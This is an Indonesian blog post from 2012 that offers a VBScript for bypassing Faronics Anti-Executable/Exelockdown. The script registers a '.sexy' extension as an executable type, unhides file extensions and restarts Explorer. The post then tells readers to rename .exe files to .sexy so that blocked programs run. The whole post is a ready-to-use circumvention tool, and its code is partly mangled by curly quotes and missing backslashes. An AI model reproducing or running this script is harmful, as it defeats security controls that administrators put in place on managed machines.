On Kamis, 16 Februari 2012

faronic anti executable standard

const HKEY_CLASSES_ROOT = &H80000000

const HKEY_CURRENT_USER = &H80000001

QUOT = chr(34)

strComputer = “.”


On error resume next

Tanya = MsgBox(”By Pass Exelockdown dengan Registry Shell Spawning”& _

vbNewLine & “Reset Exelockdown?”, 36,”Exelockdown Hacking – by Lovepassword”)

If Tanya = 6 Then ‘Bila dipilih YA

Set objRegistry = GetObject(”winmgmts:{impersonationLevel=impersonat e}!\” &strComputer & ” ootdefault:StdRegProv”)


objRegistry.CreateKey HKEY_CLASSES_ROOT, “.sexy”

objRegistry.SetStringValue HKEY_CLASSES_ROOT,”.sexy”,,”exefile”

objRegistry.SetStringValue HKEY_CLASSES_ROOT,”.sexy”,”Content Type”,”application/x-msdownload”

objRegistry.CreateKey HKEY_CLASSES_ROOT, “.sexyPersistentHandler”

objRegistry.SetStringValue HKEY_CLASSES_ROOT,”.sexyPersistentHandler”,,”{098f 2470-bae0-11cd-b579-08002b30bfeb}”

objRegistry.CreateKey HKEY_CURRENT_USER, “SoftwareMicrosoftWindowsCurrentVersionExplorerAdv anced”

objRegistry.SetDWORDValue HKEY_CURRENT_USER,”SoftwareMicrosoftWindowsCurrent VersionExplorerAdvanced”,”HideFileExt”,0

Set objWMIService = GetObject(”winmgmts:” _

& “{impersonationLevel=impersonate}!\” & strComputer & ” ootcimv2?)


Set colProcessList = objWMIService.ExecQuery _

(”SELECT * FROM Win32_Process WHERE Name = ‘explorer.exe’”)

For Each objProcess in colProcessList

objProcess.Terminate()

Next

set objShell = createobject(”Wscript.Shell”)

objShell.Run “explorer.exe”

msgbox “Copi file exe, rename menjadi file sexy, lalu jalankan”,vbInformation,”Exelockdown Hacking – by 060183”

End If

Silakan copy paste di notepad lalu pilih all files dan simpan dengan extensi .vbs.. jalankan… Kemudian ubah extensi file .exe jadi .sexy Maka anda selamat dari pencekalan software anti executable. Ingat jangan disalah gunakan OK!! 

Leave a Reply

Subscribe to Posts | Subscribe to Comments